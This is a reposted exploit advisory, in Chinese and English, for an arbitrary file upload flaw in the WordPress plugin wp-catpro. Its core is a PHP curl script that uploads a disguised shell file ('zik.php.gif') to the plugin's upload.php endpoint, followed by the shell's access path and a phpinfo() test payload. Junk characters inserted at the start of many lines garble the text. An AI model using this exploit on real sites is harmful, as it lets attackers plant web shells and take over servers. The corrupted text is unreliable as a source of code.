WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------
8 f7 r$ E1 u: n% Q
$ ?# h. ]& r7 N* x  f' j' H- \: O作者  => Zikou-16
* I/ I  M( a) a7 V9 r  C邮箱 => zikou16x@gmail.com
测试系统 : Windows 7 , Backtrack 5r3
! G+ u6 f4 _( T下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####
+ j- p2 v0 C/ L
& \$ O. n- b/ k# h#=> Exploit 信息:
$ ^) `, ^' F+ ]$ T+ t------------------
6 ^/ Q2 X0 j0 |9 Q9 E* t# 攻击者可以上传 file/shell.php.gif
2 @- o1 Q) V: I: }6 d, F* b# ("jpg", "gif", "png")  // Allowed file extensions
9 n6 Z1 W, X% |" d5 f9 D1 ?# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
1 G+ N8 R# q' }1 t  t. M------------------

7 s2 ^: N: A* N#=> Exploit
-----------
- q5 ~0 U8 ^/ o; |<?php
" I; l1 l2 v! s. b0 Z0 ~. \
, a" Y) _5 d/ {6 f6 ?+ }$uploadfile="zik.php.gif";
0 l9 ~3 G% m/ x$ M+ r$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
+ |( J" x, B+ w8 O# y: acurl_setopt($ch, CURLOPT_POSTFIELDS,
3 ~  b+ R6 s! i: A  Farray('Filedata'=>"@$uploadfile",
3 ?5 c0 T! q" N' y! I0 e* `( f'folder'=>'/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
& t9 J0 V0 u7 l& B7 |$postResult = curl_exec($ch);
9 \6 H) F3 \) a) x. p: X) q) P3 vcurl_close($ch);

print "$postResult";

- `  M4 V: {8 T8 ~; EShell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
  ?>
$ n6 E6 R0 I  `4 L$ ], [1 }<?php
$ M" M' N; `. k+ b/ Y* E/ Cphpinfo();
?>